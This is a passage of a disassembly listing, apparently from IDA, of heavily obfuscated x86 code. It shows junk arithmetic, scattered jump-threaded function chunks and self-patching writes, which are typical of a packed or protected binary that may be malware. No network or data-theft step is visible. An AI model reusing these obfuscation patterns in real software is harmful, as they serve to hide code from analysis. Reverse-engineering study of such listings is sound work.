		jmp	loc_441A63
; END OF FUNCTION CHUNK	FOR sub_4468FE

; =============== S U B	R O U T	I N E =======================================



sub_44C678	proc near		; CODE XREF: k2vbe3.d:0043C280j
					; sub_44B627+15p

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		jmp	sub_44ADEC
sub_44C678	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C684:				; CODE XREF: k2vbe3.d:0044B86Bj
		cmp	ebp, eax
		jmp	loc_458FE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_44C68B:				; CODE XREF: sub_444144+4E83j
					; sub_444144:loc_44D2C4j
		xor	ecx, 69666858h
		test	ecx, 2000h
		jmp	loc_43F1A1
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------

loc_44C69C:				; CODE XREF: k2vbe3.d:loc_455A8Dj
		mov	byte ptr [eax],	0C3h
		jmp	loc_457C60

; =============== S U B	R O U T	I N E =======================================



sub_44C6A4	proc near		; CODE XREF: sub_41A84D+Cp
					; k2vbe3.d:00457C4Aj
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004548CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457C2D SIZE 0000001D BYTES

		push	ecx
		push	812DBC7Bh
		pop	ecx
		jmp	loc_457C2D
sub_44C6A4	endp

; ---------------------------------------------------------------------------
		mov	ds:dword_44BD38, eax
		xor	eax, eax
		push	ecx
		push	0C48142C1h
		jmp	loc_44F4A4
; ---------------------------------------------------------------------------

loc_44C6C2:				; CODE XREF: k2vbe3.d:004491B3j
		xchg	esi, [esp]
		jmp	nullsub_8

; =============== S U B	R O U T	I N E =======================================



sub_44C6CA	proc near		; CODE XREF: sub_44869Dj
					; DATA XREF: sub_45AA57-123C4o

; FUNCTION CHUNK AT 00456343 SIZE 00000005 BYTES

		cmp	ds:byte_4411F0,	0
		jnz	loc_45B73E
		lea	edx, [ebp-14h]
		mov	eax, offset dword_4411F8
		call	sub_45B74D
		lea	eax, [ebp-14h]
		jmp	loc_456343
sub_44C6CA	endp


; =============== S U B	R O U T	I N E =======================================



sub_44C6EC	proc near		; CODE XREF: sub_45AA57j

; FUNCTION CHUNK AT 0044F7BF SIZE 00000017 BYTES

		push	ebp
		jmp	loc_44F7BF
sub_44C6EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	edx
		push	esi
		mov	esi, edi
		jmp	loc_442870
; ---------------------------------------------------------------------------

loc_44C6FE:				; CODE XREF: k2vbe3.d:0043EC83j
		and	esi, 0F6008D56h

loc_44C704:				; CODE XREF: k2vbe3.d:loc_43EC67j
		and	eax, 3DFCDE81h
		xor	eax, 0FFBB43B9h
		add	eax, 944F6C9h
		push	offset sub_459798
		jmp	locret_44985F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44C720:				; CODE XREF: sub_43CCD0:loc_44DC74j
		pop	ecx
		or	ecx, 1E217591h
		rol	ecx, 1
		xor	ecx, 0B40B09FBh
		test	ecx, 1
		jmp	loc_442A97
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
		sub	edi, ebp
		sbb	edx, 5C8C22C5h
		jmp	sub_441EBE
; ---------------------------------------------------------------------------

loc_44C747:				; CODE XREF: k2vbe3.d:0044658Aj
		jnp	loc_44F4F3

; =============== S U B	R O U T	I N E =======================================



sub_44C74D	proc near		; CODE XREF: sub_43D31B+117ECp

; FUNCTION CHUNK AT 00447740 SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		call	sub_4502BA

loc_44C757:				; CODE XREF: sub_4534C2+61B6j
		jmp	loc_447740
sub_44C74D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FFDC

loc_44C75C:				; CODE XREF: sub_43FFDC+166F3j
		jmp	loc_440442
; END OF FUNCTION CHUNK	FOR sub_43FFDC
; ---------------------------------------------------------------------------

loc_44C761:				; CODE XREF: k2vbe3.d:00448F46j
		jmp	loc_452B60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_44C766:				; CODE XREF: sub_451EB7:loc_4440B0j
		mov	ecx, 3F1h
		xor	edx, edx
		div	ecx
		mov	[ebp-14h], edx
		jmp	loc_446C52
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------

loc_44C777:				; CODE XREF: k2vbe3.d:loc_459A1Fj
					; k2vbe3.d:00459A43j
		add	edx, 0FE2022C0h
		call	sub_45B20A
		call	sub_4436CE
		mov	edx, 0CE3062ECh
		call	sub_45B20A
		jmp	loc_440A57
; ---------------------------------------------------------------------------

loc_44C796:				; CODE XREF: k2vbe3.d:0045A5B7j
		cmp	edi, 0D8CFB7C1h
		jmp	loc_45980A
; ---------------------------------------------------------------------------

loc_44C7A1:				; CODE XREF: k2vbe3.d:loc_440068j
		pop	edi
		or	edi, 0D202FF23h
		js	loc_4433E2
		or	edx, 3040E3E8h
		mov	[ebx], ebp
		jmp	loc_44BC2E
; ---------------------------------------------------------------------------

loc_44C7BB:				; CODE XREF: k2vbe3.d:0044DDDBj
		jge	loc_4575B5
		popf
		rol	edx, 0Eh
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_44C7C5:				; CODE XREF: sub_4443DD:loc_45176Aj
		rol	eax, 1
		jmp	loc_44229C
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------

loc_44C7CC:				; CODE XREF: k2vbe3.d:loc_45958Aj
		pop	edx
		sub	edx, 4441E5A5h
		push	offset sub_453DF7
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44C7D8:				; CODE XREF: sub_440C94:loc_44BB21j
		jmp	nullsub_436
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44C7DD:				; CODE XREF: sub_449372:loc_451F18j
		jz	loc_45566E
; END OF FUNCTION CHUNK	FOR sub_449372
; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_44C7E3:				; CODE XREF: sub_43C04E+B713j
		jmp	loc_452340
; END OF FUNCTION CHUNK	FOR sub_43C04E
; ---------------------------------------------------------------------------
		mov	ebp, ebx
		sub	esi, edx
		jmp	loc_455668
; ---------------------------------------------------------------------------
		mov	[ebx], edi
		jmp	sub_444BEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44C7F8:				; CODE XREF: sub_4582DD-1A11Ej
					; sub_4582DD:loc_440898j ...
		jmp	loc_452E54
; ---------------------------------------------------------------------------

loc_44C7FD:				; CODE XREF: sub_443A30-509Ej
					; sub_4582DD+282Bj
		xchg	eax, [esp+0]
		push	eax
		pop	ecx
		pop	eax

loc_44C803:				; CODE XREF: k2vbe3.d:loc_441BEEj
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EDE6

loc_44C805:				; CODE XREF: sub_43EDE6+18j
		jmp	loc_44F296
; END OF FUNCTION CHUNK	FOR sub_43EDE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445243

loc_44C80A:				; CODE XREF: sub_445243+8j
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		call	sub_4503D6
; END OF FUNCTION CHUNK	FOR sub_445243
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_44C814:				; CODE XREF: sub_43EEC6+19676j
		jmp	loc_4493C7
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_44C819:				; CODE XREF: sub_44E90D+582Dj
		jmp	loc_43C365
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------

loc_44C81E:				; CODE XREF: k2vbe3.d:004468C9j
		jmp	loc_440C22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_44C823:				; CODE XREF: sub_442475:loc_44463Fj
		or	ebp, 41372476h
		or	ebp, 2204A40Bh
		jmp	loc_45A201
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_44C834:				; CODE XREF: sub_45B20A:loc_43F931j
		shr	edx, 3
		mov	ecx, ds:dword_43FA7C
		or	[ecx+edx], al
		push	3A012185h
		pop	ecx
		add	ecx, 524294ABh
		sub	ecx, 5BD9BDE6h
		jmp	loc_448BAC
; END OF FUNCTION CHUNK	FOR sub_45B20A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_351. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C858:				; CODE XREF: k2vbe3.d:004551A5j
		jmp	loc_452568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D887

loc_44C85D:				; CODE XREF: sub_44D887+5B52j
		jmp	sub_442D04
; END OF FUNCTION CHUNK	FOR sub_44D887
; ---------------------------------------------------------------------------
		pop	ebx
		jmp	sub_44F614
; ---------------------------------------------------------------------------

loc_44C868:				; CODE XREF: k2vbe3.d:0043C97Aj
		test	eax, edx
		jmp	loc_456083
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_276. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4489E3

loc_44C870:				; CODE XREF: sub_4489E3+7j
		jmp	sub_44CF14
; END OF FUNCTION CHUNK	FOR sub_4489E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44C875:				; CODE XREF: sub_44471B:loc_45662Dj
		push	esi
		push	231152D2h
		pop	esi
		sub	esi, 821DC6BDh
		and	esi, 53FFB37Fh
		cmp	esi, 34876789h
		jmp	loc_43C51E
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BCF0

loc_44C893:				; CODE XREF: sub_45BCF0-12899j
		mov	eax, [eax]
		push	offset sub_451078
		jmp	nullsub_521
; END OF FUNCTION CHUNK	FOR sub_45BCF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_44C89F:				; CODE XREF: sub_4408BD:loc_44D156j
		jge	loc_449F22

loc_44C8A5:				; CODE XREF: k2vbe3.d:004486EDj
		jmp	nullsub_377
; END OF FUNCTION CHUNK	FOR sub_4408BD
; ---------------------------------------------------------------------------
		and	esi, eax
		xchg	ebx, ecx
		jmp	loc_449F22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_44C8B3:				; CODE XREF: sub_43EEC6:loc_4584BCj
		jnz	loc_440BCD
		shr	ebx, 1Fh
		push	edi
		jmp	loc_440BCB
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------

loc_44C8C2:				; CODE XREF: k2vbe3.d:00457943j
		jo	loc_452EDE
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_44C8C8:				; CODE XREF: sub_44083C:loc_45332Fj
		and	eax, 0A9F3CE70h
		rol	eax, 3
		or	eax, 2AF62C80h
		xor	eax, 0C78EF339h
		add	eax, ebp
		call	sub_45BB9D

loc_44C8E4:				; CODE XREF: sub_45B710:loc_459AE5j
		mov	ecx, ebx

loc_44C8E6:				; CODE XREF: k2vbe3.d:0043E65Aj
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		xchg	ebx, [esp+0]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jno	loc_43E083
		jmp	loc_441A74
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------

loc_44C901:				; CODE XREF: k2vbe3.d:0044D8B2j
		jb	loc_4413A5
		add	edx, edi
		jmp	loc_449952

; =============== S U B	R O U T	I N E =======================================



sub_44C90E	proc near		; CODE XREF: k2vbe3.d:00447256j
					; sub_44E90D-6F9Bp

var_124		= dword	ptr -124h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C25D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C49C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CD15 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D806 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DD54 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E5D8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043ECE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ECFF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043EE66 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F292 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043F750 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043F85D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F8D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FC09 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440C6A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004411EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441CAD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044321A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443311 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443349 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044339C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443FD7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004442F2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044459F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444B01 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00444B39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444C96 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445350 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004454CB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044561C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F1B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445F63 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004462D0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446748 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A55 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004472C2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447838 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447D0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004481BE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00448567 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044905A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449AFF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449C30 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00449D5F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A087 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A4BF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A50F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A716 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044A72E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A765 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B641 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044BCF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C255 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C616 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D1BD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044D685 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D82E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E214 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E590 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EE55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F462 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F650 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FB65 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044FDBC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450082 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00450879 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450A0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C43 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450CAA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004513CF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045160A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451BFF SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00452296 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452762 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00452877 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004529B6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452CE7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452FBD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004530EF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453335 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004539EE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453B4E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454366 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004549CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D1E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454E8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455195 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455290 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455343 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455386 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456013 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456793 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456BA2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457345 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457C03 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458E1D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004597F6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045982A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459FD2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459FE1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045AC77 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B8D7 SIZE 0000001B BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_45B69B
		cmp	dword ptr [ebp-10Ch], 656C6946h
		jnz	loc_44A72E
		jmp	loc_446748
sub_44C90E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C92C:				; CODE XREF: k2vbe3.d:0045B8D2j
		pop	esi
		mov	eax, [esp]
		call	sub_4566DA
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_44C935:				; CODE XREF: sub_44B979:loc_4417F0j
		jmp	loc_43E633
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_44C93A:				; CODE XREF: sub_43DA1E:loc_4544BEj
		jnz	loc_449A07
		jmp	loc_44099C
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------

loc_44C945:				; CODE XREF: k2vbe3.d:00448213j
		cmp	edi, 276E5AA8h
		jmp	loc_44C21E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C951:				; CODE XREF: k2vbe3.d:00455DD1j
		jmp	loc_450BB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452255

loc_44C956:				; CODE XREF: sub_452255+12j
		jmp	loc_44A5F6
; END OF FUNCTION CHUNK	FOR sub_452255
; ---------------------------------------------------------------------------

loc_44C95B:				; CODE XREF: k2vbe3.d:0044ECA1j
		jmp	nullsub_473
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2FC

loc_44C960:				; CODE XREF: sub_43E2FC+597Aj
		jmp	loc_4573AF
; END OF FUNCTION CHUNK	FOR sub_43E2FC
; ---------------------------------------------------------------------------
		shl	ebx, 1Eh
		jmp	sub_442577
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44C96D:				; CODE XREF: sub_440C94:loc_4404EAj
		mov	edx, eax
		call	sub_45B74D
		xchg	eax, [esp+0]

loc_44C977:				; CODE XREF: k2vbe3.d:loc_44B8B3j
		mov	edx, eax
		pop	eax
		jmp	loc_43E814
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44C97F:				; CODE XREF: sub_44ED3C+54E3j
		jge	loc_4553A8
		jnb	loc_450154
		jmp	loc_45539D
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_44C990	proc near		; DATA XREF: k2vbe3.d:0043EDB4o

; FUNCTION CHUNK AT 004536C8 SIZE 0000000D BYTES

		jz	loc_4536C8
		mov	eax, [esp+0]
		push	edx
		call	sub_4599AA
		jmp	loc_45A799
sub_44C990	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_44C9A4:				; CODE XREF: sub_442475+F5BFj
		or	ecx, esi
		add	eax, 8FF0125Bh
		pushf
		js	loc_4506A0
		jmp	loc_44E773
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_44C9B8:				; CODE XREF: sub_45762D:loc_43E86Cj
		popf
		add	eax, edi
		pop	edi
		push	ecx
		push	75F9F31Fh
		pop	ecx
		add	ecx, 0A444EB80h
		jmp	loc_44BA12
; END OF FUNCTION CHUNK	FOR sub_45762D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_253. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C99

loc_44C9CF:				; CODE XREF: sub_452C99+19j
		jmp	loc_458E93
; END OF FUNCTION CHUNK	FOR sub_452C99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44C9D4:				; CODE XREF: sub_4424CF+1052Ej
		jmp	loc_44F851
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------

loc_44C9D9:				; CODE XREF: k2vbe3.d:0044F7E9j
		rol	ebx, 17h

; =============== S U B	R O U T	I N E =======================================



sub_44C9DC	proc near		; CODE XREF: sub_4508AF+Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00441C72 SIZE 00000009 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		ror	eax, 0Eh
		mov	edx, [esp-4+arg_0]
		push	eax
		mov	eax, edx
		call	sub_43C206
		jmp	loc_441C72
sub_44C9DC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44C9F3:				; CODE XREF: sub_44B999+6497j
		jl	loc_443ADA
		pushf

loc_44C9FA:				; CODE XREF: sub_44B999-CB8Ej
					; k2vbe3.d:00441BCEj ...
		call	sub_43EFDA
; END OF FUNCTION CHUNK	FOR sub_44B999
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_44CA00:				; CODE XREF: sub_43DEBE+108C6j
		jmp	loc_45BC04
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44CA05:				; CODE XREF: sub_4424CF-32D0j
					; sub_45A5FF+Ej
		call	sub_456100

loc_44CA0A:				; CODE XREF: sub_45A4C1-1D9A6j
		jmp	loc_4500E6
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------

locret_44CA0F:				; CODE XREF: k2vbe3.d:00456230j
		retn
; ---------------------------------------------------------------------------

loc_44CA10:				; CODE XREF: k2vbe3.d:00455F2Ej
		jmp	loc_450D47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44CA15:				; CODE XREF: sub_45A323-F67Ej
		jmp	loc_44646D
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_44CA1A:				; DATA XREF: sub_43DDA1+295Co
		add	edx, 849E789h
		mov	[edx], eax
		push	offset sub_44C366
		jmp	locret_45144C
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0E6h, 0A5h, 0BEh
dword_44CA30	dd 7E09D7F1h		; DATA XREF: sub_4426DF+6r
					; sub_4426DF:loc_4471CCr

; =============== S U B	R O U T	I N E =======================================



sub_44CA34	proc near		; CODE XREF: .text:loc_40460Fp
					; DATA XREF: zcrshv4o:off_41E1A4o

; FUNCTION CHUNK AT 0043FDFF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440953 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441946 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004427B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F3F SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0044A116 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450D68 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00451622 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00452AA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457421 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF33 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045BA3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BEB9 SIZE 00000015 BYTES

		jb	loc_446F50
		push	10255BC7h
		pop	eax
		rol	eax, 12h
		add	eax, 9128C61Bh
		jmp	loc_4570DD
sub_44CA34	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44CA4E	proc near		; DATA XREF: sub_4478C6+9o
		push	10h
		mov	eax, [ebp-8]
sub_44CA4E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_440F56

loc_44CA53:				; CODE XREF: sub_440F56+5j
		push	edi
		mov	edi, eax
		xchg	edi, [esp+8+var_8]
		call	sub_44D863
; END OF FUNCTION CHUNK	FOR sub_440F56
; START	OF FUNCTION CHUNK FOR sub_44A7CD

loc_44CA5E:				; CODE XREF: sub_44A7CD+18j
		jmp	loc_44F25B
; END OF FUNCTION CHUNK	FOR sub_44A7CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_44CA63:				; CODE XREF: sub_447664+1467j
		jmp	sub_44660F
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4431F0

loc_44CA68:				; CODE XREF: sub_4431F0+9j
		jmp	sub_44A7C2
; END OF FUNCTION CHUNK	FOR sub_4431F0
; ---------------------------------------------------------------------------

loc_44CA6D:				; CODE XREF: k2vbe3.d:0044B0AEj
		jnz	loc_44989B

; =============== S U B	R O U T	I N E =======================================



sub_44CA73	proc near		; CODE XREF: k2vbe3.d:00452291p

; FUNCTION CHUNK AT 0044D373 SIZE 0000001E BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ecx, [ebx+edx-8]
		jmp	loc_44D373
sub_44CA73	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44CA80:				; CODE XREF: k2vbe3.d:0043FB44j
		or	ecx, ds:4000EEh
		rol	ecx, 13h
		jnb	loc_450385
		jl	nullsub_246
		adc	ebp, 0DA0FA362h
		and	edi, 89D51A34h
		jmp	loc_450385
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44CAA6:				; CODE XREF: sub_4424CF:loc_44E8B4j
		jnz	loc_446E88
		jmp	loc_4419A3
; END OF FUNCTION CHUNK	FOR sub_4424CF

; =============== S U B	R O U T	I N E =======================================



sub_44CAB1	proc near		; DATA XREF: sub_4405F5+Ao
		add	eax, ebp
		add	eax, 0FBC13D25h
		mov	eax, [eax]
		call	sub_44249A
		push	0C76BEFBFh
		pop	edx
		jmp	loc_44FC74
sub_44CAB1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44CACB:				; CODE XREF: sub_454E69-9AAEj
		and	eax, 206AE2F6h
		js	loc_45BD13

